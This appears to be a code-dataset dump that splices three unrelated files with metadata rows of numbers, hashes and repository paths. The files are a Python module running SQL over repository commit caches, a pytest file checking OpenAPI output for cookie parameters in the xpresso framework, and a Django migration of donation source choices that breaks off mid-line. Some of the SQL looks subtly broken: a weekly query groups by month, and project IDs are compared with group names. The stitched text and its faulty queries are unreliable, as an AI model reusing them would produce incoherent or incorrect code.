:param timeframe: All, year, month, or week. Contribution data from the timeframe that the current date is within will be considered
:param repo_group: the group of repositories to analyze
"""
if repo_group == None:
repo_group = 'facade_project'
if timeframe == None:
timeframe = 'all'
cdRgTpRankedLocSQL = None
if repo_group == 'facade_project':
if timeframe == "all":
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == "year":
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
LIMIT 1)
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == 'month':
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_monthly_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_monthly_cache, projects, repos
where projects.name = (SELECT projects.name FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
and MONTH(repos.added) = MONTH(CURDATE())
LIMIT 1)
and repo_monthly_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
else:
if timeframe == "all":
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == "year":
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_annual_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_annual_cache, projects, repos
where projects.name = :repo_group
and repo_annual_cache.repos_id = repos.id
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
group by repos_id
ORDER BY net desc
LIMIT 10
""")
elif timeframe == 'month':
cdRgTpRankedLocSQL = s.sql.text("""
SELECT repos_id, repos.name as name, sum(cast(repo_monthly_cache.added as signed) - cast(removed as signed) - cast(whitespace as signed)) as net, patches
FROM repo_monthly_cache, projects, repos
where projects.name = :repo_group
and repo_monthly_cache.repos_id = repos.id
and repos.projects_id = projects.id
and YEAR(repos.added) = YEAR(CURDATE())
and MONTH(repos.added) = MONTH(CURDATE())
group by repos_id
ORDER BY net desc
LIMIT 10
""")
results = pd.read_sql(cdRgTpRankedLocSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "repo_group": repo_group})
return results
@annotate(tag='cd-rep-tp-interval-loc-commits')
def cd_rep_tp_interval_loc_commits(self, repo_url, calendar_year=None, interval=None):
"""
For a single repository, all the commits and lines of code occuring for the specified year, grouped by the specified interval (week or month)
:param repo_url: the repository's URL
:param calendar_year: the calendar year a repo is created in to be considered "new"
:param interval: Month or week. The periodocity of which to examine data within the given calendar_year
"""
if calendar_year == None:
calendar_year = 2018
if interval == None:
interval = 'month'
cdRepTpIntervalLocCommitsSQL = None
if interval == "month":
cdRepTpIntervalLocCommitsSQL = s.sql.text("""
SELECT sum(cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace,
sum(IFNULL(added, 0)) as added, sum(IFNULL(removed, 0)) as removed, sum(IFNULL(whitespace, 0)) as whitespace,
IFNULL(patches, 0) as commits, a.month, IFNULL(year, :calendar_year) as year
FROM (select month from repo_monthly_cache group by month) a
LEFT JOIN (SELECT name, repo_monthly_cache.added, removed, whitespace, patches, month, IFNULL(year, :calendar_year) as year
FROM repo_monthly_cache, repos
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
AND year = :calendar_year
AND repos.id = repos_id
GROUP BY month) b
ON a.month = b.month
GROUP BY month
""")
elif interval == "week":
cdRepTpIntervalLocCommitsSQL = s.sql.text("""
SELECT sum(cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace,
sum(IFNULL(added, 0)) as added, sum(IFNULL(removed, 0)) as removed, sum(IFNULL(whitespace, 0)) as whitespace,
IFNULL(patches, 0) as commits, a.week, IFNULL(year, :calendar_year) as year
FROM (select week from repo_weekly_cache group by week) a
LEFT JOIN (SELECT name, repo_weekly_cache.added, removed, whitespace, patches, week, IFNULL(year, :calendar_year) as year
FROM repo_weekly_cache, repos
WHERE repos_id = (SELECT id FROM repos WHERE git LIKE :repourl LIMIT 1)
AND year = :calendar_year
AND repos.id = repos_id
GROUP BY week) b
ON a.week = b.week
GROUP BY week
""")
results = pd.read_sql(cdRepTpIntervalLocCommitsSQL, self.db, params={"repourl": '%{}%'.format(repo_url), 'calendar_year': calendar_year})
return results
@annotate(tag='cd-rep-tp-interval-loc-commits-ua')
def cd_rep_tp_interval_loc_commits_ua(self, repo_url, calendar_year=None, interval=None, repo_group=None):
"""
For a single repository, all the commits and lines of code occuring for the specified year, grouped by the specified interval
(week or month) and by the affiliation of individuals and domains that are not mapped as "inside" within the repositories gitdm file.
"Unknown" is, in this case, interpreted as "outside"
:param repo_url: the repository's URL
:param calendar_year: the calendar year a repo is created in to be considered "new"
:param interval: Month or week. The periodocity of which to examine data within the given calendar_year
:param repo_group: the group of repositories to analyze
"""
if calendar_year == None:
calendar_year = 2018
if interval == None:
interval = 'month'
if repo_group == None:
repo_group = 'facade_project'
cdRepTpIntervalLocCommitsUaSQL = None
if repo_group == 'facade_project':
if interval == "month":
cdRepTpIntervalLocCommitsUaSQL = s.sql.text("""
SELECT added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.month, affiliation
FROM (SELECT month FROM repo_monthly_cache GROUP BY month) a
LEFT JOIN
(
SELECT SUM(repo_monthly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, month, SUM(patches) as patches, repo_monthly_cache.`affiliation` as affiliation
FROM repo_monthly_cache, repos, projects
WHERE repo_monthly_cache.repos_id = repos.id
AND repos.projects_id = (SELECT projects.id FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
AND projects.id = repos.projects_id
AND repo_monthly_cache.`affiliation` <> projects.name
AND year = :calendar_year
GROUP BY month, affiliation
) b ON a.month = b.month
ORDER BY month
""")
elif interval == "week":
cdRepTpIntervalLocCommitsUaSQL = s.sql.text("""
SELECT added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.week, affiliation
FROM (SELECT week FROM repo_weekly_cache GROUP BY week) a
LEFT JOIN
(
SELECT SUM(repo_weekly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, week, SUM(patches) as patches, repo_weekly_cache.`affiliation` as affiliation
FROM repo_weekly_cache, repos, projects
WHERE repo_weekly_cache.repos_id = repos.id
AND repos.projects_id = (SELECT projects.id FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
AND projects.id = repos.projects_id
AND repo_weekly_cache.`affiliation` <> projects.name
AND year = :calendar_year
GROUP BY week, affiliation
) b ON a.week = b.week
ORDER BY week
""")
else:
if interval == "month":
cdRepTpIntervalLocCommitsUaSQL = s.sql.text("""
SELECT added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.month, affiliation
FROM (SELECT month FROM repo_monthly_cache GROUP BY month) a
LEFT JOIN
(
SELECT SUM(repo_monthly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, month, SUM(patches) as patches, repo_monthly_cache.`affiliation` as affiliation
FROM repo_monthly_cache, repos, projects
WHERE repo_monthly_cache.repos_id = repos.id
AND repos.projects_id = :repo_group
AND projects.id = repos.projects_id
AND repo_monthly_cache.`affiliation` <> projects.name
AND year = :calendar_year
GROUP BY month, affiliation
) b ON a.month = b.month
ORDER BY month
""")
elif interval == "week":
cdRepTpIntervalLocCommitsUaSQL = s.sql.text("""
SELECT added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.week, affiliation
FROM (SELECT week FROM repo_weekly_cache GROUP BY week) a
LEFT JOIN
(
SELECT SUM(repo_weekly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, week, SUM(patches) as patches, repo_weekly_cache.`affiliation` as affiliation
FROM repo_weekly_cache, repos, projects
WHERE repo_weekly_cache.repos_id = repos.id
AND repos.projects_id = :repo_group
AND projects.id = repos.projects_id
AND repo_weekly_cache.`affiliation` <> projects.name
AND year = :calendar_year
GROUP BY month, affiliation
) b ON a.week = b.week
ORDER BY week
""")
results = pd.read_sql(cdRepTpIntervalLocCommitsUaSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "repo_group": repo_group, 'calendar_year': calendar_year})
return results
@annotate(tag='cd-rg-tp-interval-loc-commits')
def cd_rg_tp_interval_loc_commits(self, repo_url, calendar_year=None, interval=None, repo_group=None):
"""
For each repository in a collection of repositories, all the commits and lines of code occuring for the specified year,
grouped by repository and the specified interval (week or month). Results ordered by repo.
:param repo_url: the repository's URL
:param calendar_year: the calendar year a repo is created in to be considered "new"
:param interval: Month or week. The periodocity of which to examine data within the given calendar_year
:param repo_group: the group of repositories to analyze
"""
if calendar_year == None:
calendar_year = 2019
if interval == None:
interval = 'month'
if repo_group == None:
repo_group = 'facade_project'
cdRgTpIntervalLocCommitsSQL = None
if repo_group == 'facade_project':
if interval == "month":
cdRgTpIntervalLocCommitsSQL = s.sql.text("""
SELECT name, added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.month
FROM (SELECT month FROM repo_monthly_cache GROUP BY month) a
LEFT JOIN
(
SELECT repos.name, SUM(repo_monthly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, month, SUM(patches) as patches
FROM repo_monthly_cache, repos, projects
WHERE repo_monthly_cache.repos_id = repos.id
AND repos.projects_id = (SELECT projects.id FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
AND projects.id = repos.projects_id
AND repos_id = repos.id
AND year = :calendar_year
GROUP BY month, repos.name
) b ON a.month = b.month
ORDER BY month, name
""")
elif interval == "week":
cdRgTpIntervalLocCommitsSQL = s.sql.text("""
SELECT name, added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.week
FROM (SELECT week FROM repo_weekly_cache GROUP BY week) a
LEFT JOIN
(
SELECT repos.name, SUM(repo_weekly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, week, SUM(patches) as patches
FROM repo_weekly_cache, repos, projects
WHERE repo_weekly_cache.repos_id = repos.id
AND repos.projects_id = (SELECT projects.id FROM repos, projects
WHERE git LIKE :repourl
and repos.projects_id = projects.id
LIMIT 1)
AND projects.id = repos.projects_id
AND repos_id = repos.id
AND year = :calendar_year
GROUP BY week, repos.name
) b ON a.week = b.week
ORDER BY week, name
""")
else:
if interval == "month":
cdRgTpIntervalLocCommitsSQL = s.sql.text("""
SELECT name, added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.month
FROM (SELECT month FROM repo_monthly_cache GROUP BY month) a
LEFT JOIN
(
SELECT repos.name, SUM(repo_monthly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, month, SUM(patches) as patches
FROM repo_monthly_cache, repos, projects
WHERE repo_monthly_cache.repos_id = repos.id
AND repos.projects_id = :repo_group
AND projects.id = repos.projects_id
AND repos_id = repos.id
AND year = :calendar_year
GROUP BY month, repos.name
) b ON a.month = b.month
ORDER BY month, name
""")
elif interval == "week":
cdRgTpIntervalLocCommitsSQL = s.sql.text("""
SELECT name, added, whitespace, removed, (cast(IFNULL(added, 0) as signed) - cast(IFNULL(removed, 0) as signed) - cast(IFNULL(whitespace, 0) as signed)) as net_lines_minus_whitespace, patches, a.week
FROM (SELECT week FROM repo_weekly_cache GROUP BY week) a
LEFT JOIN
(
SELECT repos.name, SUM(repo_weekly_cache.added) AS added, SUM(whitespace) as whitespace, SUM(removed) as removed, week, SUM(patches) as patches
FROM repo_weekly_cache, repos, projects
WHERE repo_weekly_cache.repos_id = repos.id
AND repos.projects_id = :repo_group
AND projects.id = repos.projects_id
AND repos_id = repos.id
AND year = :calendar_year
GROUP BY week, repos.name
) b ON a.week = b.week
ORDER BY week, name
""")
results = pd.read_sql(cdRgTpIntervalLocCommitsSQL, self.db, params={"repourl": '%{}%'.format(repo_url), "calendar_year": calendar_year, "repo_group": repo_group})
return results
| 51.76699
| 228
| 0.565106
| 4,266
| 37,324
| 4.810595
| 0.059306
| 0.033769
| 0.030406
| 0.032453
| 0.887535
| 0.870432
| 0.85211
| 0.842267
| 0.832716
| 0.817513
| 0
| 0.005114
| 0.345113
| 37,324
| 721
| 229
| 51.76699
| 0.834472
| 0.116011
| 0
| 0.800738
| 0
| 0.079336
| 0.751067
| 0.080593
| 0
| 0
| 0
| 0
| 0
| 1
| 0.023985
| false
| 0.00369
| 0.009225
| 0
| 0.057196
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
13a39b83fe27c2a09cc4a5b2b2374e472f282c4e
| 18,322
|
py
|
Python
|
tests/test_openapi/params/test_cookie_openapi.py
|
graingert/xpresso
|
217ae3ca0e1f2d1d69bbb0376e8aab6decd64d6c
|
[
"MIT"
] | null | null | null |
tests/test_openapi/params/test_cookie_openapi.py
|
graingert/xpresso
|
217ae3ca0e1f2d1d69bbb0376e8aab6decd64d6c
|
[
"MIT"
] | null | null | null |
tests/test_openapi/params/test_cookie_openapi.py
|
graingert/xpresso
|
217ae3ca0e1f2d1d69bbb0376e8aab6decd64d6c
|
[
"MIT"
] | null | null | null |
import typing
import pytest
from pydantic import BaseModel
from starlette.responses import Response
from starlette.testclient import TestClient
from xpresso import App, CookieParam, FromCookie, Path
from xpresso.typing import Annotated
@pytest.mark.parametrize(
"explode",
[True, False],
)
def test_serialization(
explode: bool,
) -> None:
async def endpoint(
cookie: Annotated[int, CookieParam(explode=explode)]
) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": explode,
"schema": {"title": "Cookie", "type": "integer"},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
def test_scalar() -> None:
async def endpoint(cookie: FromCookie[int]) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": True,
"schema": {"title": "Cookie", "type": "integer"},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
def test_array() -> None:
async def endpoint(
# arrays only work with explode=False
cookie: Annotated[typing.List[int], CookieParam(explode=False)]
) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": False,
"style": "form",
"explode": False,
"schema": {
"title": "Cookie",
"type": "array",
"items": {"type": "integer"},
},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
def test_object() -> None:
class ShallowObject(BaseModel):
foo: int
bar: str
async def endpoint(
# objects only work with explode=False
cookie: Annotated[ShallowObject, CookieParam(explode=False)]
) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": False,
"schema": {"$ref": "#/components/schemas/ShallowObject"},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ShallowObject": {
"title": "ShallowObject",
"required": ["foo", "bar"],
"type": "object",
"properties": {
"foo": {"title": "Foo", "type": "integer"},
"bar": {"title": "Bar", "type": "string"},
},
},
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
def test_default() -> None:
async def endpoint(cookie: FromCookie[int] = 2) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": False,
"style": "form",
"explode": True,
"schema": {
"title": "Cookie",
"type": "integer",
"default": 2,
},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
def test_nullable() -> None:
async def endpoint(cookie: FromCookie[typing.Optional[int]]) -> Response:
...
app = App([Path("/", get=endpoint)])
expected_openapi: typing.Dict[str, typing.Any] = {
"openapi": "3.0.3",
"info": {"title": "API", "version": "0.1.0"},
"paths": {
"/": {
"get": {
"responses": {
"200": {"description": "Successful Response"},
"422": {
"description": "Validation Error",
"content": {
"application/json": {
"schema": {
"$ref": "#/components/schemas/HTTPValidationError"
}
}
},
},
},
"parameters": [
{
"required": True,
"style": "form",
"explode": True,
"schema": {
"title": "Cookie",
"type": "integer",
"nullable": True,
},
"name": "cookie",
"in": "cookie",
}
],
}
}
},
"components": {
"schemas": {
"ValidationError": {
"title": "ValidationError",
"required": ["loc", "msg", "type"],
"type": "object",
"properties": {
"loc": {
"title": "Location",
"type": "array",
"items": {
"oneOf": [{"type": "string"}, {"type": "integer"}]
},
},
"msg": {"title": "Message", "type": "string"},
"type": {"title": "Error Type", "type": "string"},
},
},
"HTTPValidationError": {
"title": "HTTPValidationError",
"type": "object",
"properties": {
"detail": {
"title": "Detail",
"type": "array",
"items": {"$ref": "#/components/schemas/ValidationError"},
}
},
},
}
},
}
with TestClient(app) as client:
resp = client.get("/openapi.json")
assert resp.status_code == 200, resp.content
assert resp.json() == expected_openapi
| 35.855186
| 90
| 0.304825
| 943
| 18,322
| 5.897137
| 0.104984
| 0.058083
| 0.046754
| 0.032728
| 0.880237
| 0.871606
| 0.858838
| 0.831325
| 0.831325
| 0.825571
| 0
| 0.011385
| 0.558946
| 18,322
| 510
| 91
| 35.92549
| 0.676773
| 0.00393
| 0
| 0.656842
| 0
| 0
| 0.21198
| 0.026854
| 0
| 0
| 0
| 0
| 0.025263
| 1
| 0.012632
| false
| 0
| 0.014737
| 0
| 0.033684
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
13d3f13e1966a5fc3a79ab41a67c23e5257295f1
| 6,108
|
py
|
Python
|
tovp/contributions/migrations/0061_auto_20170301_1326.py
|
nrsimha/tovp
|
311bc957c95c294811d737f5df30b0a218d35610
|
[
"MIT"
] | null | null | null |
tovp/contributions/migrations/0061_auto_20170301_1326.py
|
nrsimha/tovp
|
311bc957c95c294811d737f5df30b0a218d35610
|
[
"MIT"
] | null | null | null |
tovp/contributions/migrations/0061_auto_20170301_1326.py
|
nrsimha/tovp
|
311bc957c95c294811d737f5df30b0a218d35610
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.4 on 2017-03-01 13:26
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('contributions', '0060_auto_20170211_1019'),
]
operations = [
migrations.AlterField(
model_name='bulkpayment',
name='source',
field=models.CharField(blank=True, choices=[('ahmedabad-1', 'Ahmedabad 1'), ('ahmedabad-2', 'Ahmedabad 2'), ('tovp-f-mayapur', 'TOVP Fundraising Mayapur'), ('tovp-exhibits', 'TOVP Exhibits'), ('baroda', 'Baroda'), ('bcs-vp-2015', 'BCS Vyasa Puja 2015'), ('bhagavata-saptaha-2015', 'Bhagavata Saptaha 2015'), ('bhakti-vriksa-kolkata-2016', 'Bhakti Vriksa Kolkata 2016'), ('braj-mohan-mumbai', 'Braj Mohan (Mumbai)'), ('delhi-vidyanagar-2015', 'Delhi Vidyanagar 2015'), ('gkg-vp-2015', 'GKG Vyasa Puja 2015'), ('gkg-vp-2016', 'GKG Vyasa Puja 2016'), ('ils-2016', 'ILS 2016'), ('iskcon-silicon-valley', 'ISKCON Silicon Valley (ISV)'), ('j-w-marriot', 'J W Marriot'), ('jps-office', 'JPS Office'), ('jps-others', 'JPS Others'), ('kolkata-nityananda-yatra-2017', 'Kolkata Nityananda Yatra 2017'), ('kanjurmarg-mumbai-2015', 'Kanjurmarg Mumbai 2015'), ('lm-reception', 'Life Membership Reception'), ('mayapur-community', 'Mayapur Community'), ('mso', 'MSO'), ('mumbai-yatra-2016', 'Mumbai Yatra 2016'), ('namahatta', 'JPS Namahatta'), ('botswana-2016', 'Botswana 2016'), ('south-afrika-2016', 'South Afrika 2016'), ('neel-vasan-das', 'Neel Vasan Das'), ('nigdi-2016.', 'Nigdi 2016.'), ('nityananda', 'Nityananda Tour'), ('nvs', 'Nava Yogendra Swami'), ('other', 'Other'), ('prabhupada-currency-inr', 'Prabhupada Currency INR'), ('pune-group-mayapur-2015', 'Pune Group Mayapur 2015'), ('pune-yatra-2016', 'Pune Yatra 2016'), ('rns-kartik-yatra', 'RNS Kartik Yatra'), ('rohini-narayani', 'Rohini (Sri Narayani Devi Dasi)'), ('surat-1', 'Surat 1'), ('surat-2', 'Surat 2'), ('vallabha-vidyanagar', 'Vallabha Vidyanagar'), ('vrindavan-booth', 'Vrindavan Booth 2015'), ('vrindavan-booth-2016', 'Vrindavan Booth 2016'), ('vvps-vp-2015', 'Vedavyasapriya Swami Vyasa Puja 2015')], default='', max_length=30, verbose_name='Source'),
),
migrations.AlterField(
model_name='contribution',
name='source',
field=models.CharField(blank=True, choices=[('ahmedabad-1', 'Ahmedabad 1'), ('ahmedabad-2', 'Ahmedabad 2'), ('tovp-f-mayapur', 'TOVP Fundraising Mayapur'), ('tovp-exhibits', 'TOVP Exhibits'), ('baroda', 'Baroda'), ('bcs-vp-2015', 'BCS Vyasa Puja 2015'), ('bhagavata-saptaha-2015', 'Bhagavata Saptaha 2015'), ('bhakti-vriksa-kolkata-2016', 'Bhakti Vriksa Kolkata 2016'), ('braj-mohan-mumbai', 'Braj Mohan (Mumbai)'), ('delhi-vidyanagar-2015', 'Delhi Vidyanagar 2015'), ('gkg-vp-2015', 'GKG Vyasa Puja 2015'), ('gkg-vp-2016', 'GKG Vyasa Puja 2016'), ('ils-2016', 'ILS 2016'), ('iskcon-silicon-valley', 'ISKCON Silicon Valley (ISV)'), ('j-w-marriot', 'J W Marriot'), ('jps-office', 'JPS Office'), ('jps-others', 'JPS Others'), ('kolkata-nityananda-yatra-2017', 'Kolkata Nityananda Yatra 2017'), ('kanjurmarg-mumbai-2015', 'Kanjurmarg Mumbai 2015'), ('lm-reception', 'Life Membership Reception'), ('mayapur-community', 'Mayapur Community'), ('mso', 'MSO'), ('mumbai-yatra-2016', 'Mumbai Yatra 2016'), ('namahatta', 'JPS Namahatta'), ('botswana-2016', 'Botswana 2016'), ('south-afrika-2016', 'South Afrika 2016'), ('neel-vasan-das', 'Neel Vasan Das'), ('nigdi-2016.', 'Nigdi 2016.'), ('nityananda', 'Nityananda Tour'), ('nvs', 'Nava Yogendra Swami'), ('other', 'Other'), ('prabhupada-currency-inr', 'Prabhupada Currency INR'), ('pune-group-mayapur-2015', 'Pune Group Mayapur 2015'), ('pune-yatra-2016', 'Pune Yatra 2016'), ('rns-kartik-yatra', 'RNS Kartik Yatra'), ('rohini-narayani', 'Rohini (Sri Narayani Devi Dasi)'), ('surat-1', 'Surat 1'), ('surat-2', 'Surat 2'), ('vallabha-vidyanagar', 'Vallabha Vidyanagar'), ('vrindavan-booth', 'Vrindavan Booth 2015'), ('vrindavan-booth-2016', 'Vrindavan Booth 2016'), ('vvps-vp-2015', 'Vedavyasapriya Swami Vyasa Puja 2015')], default='', max_length=30, 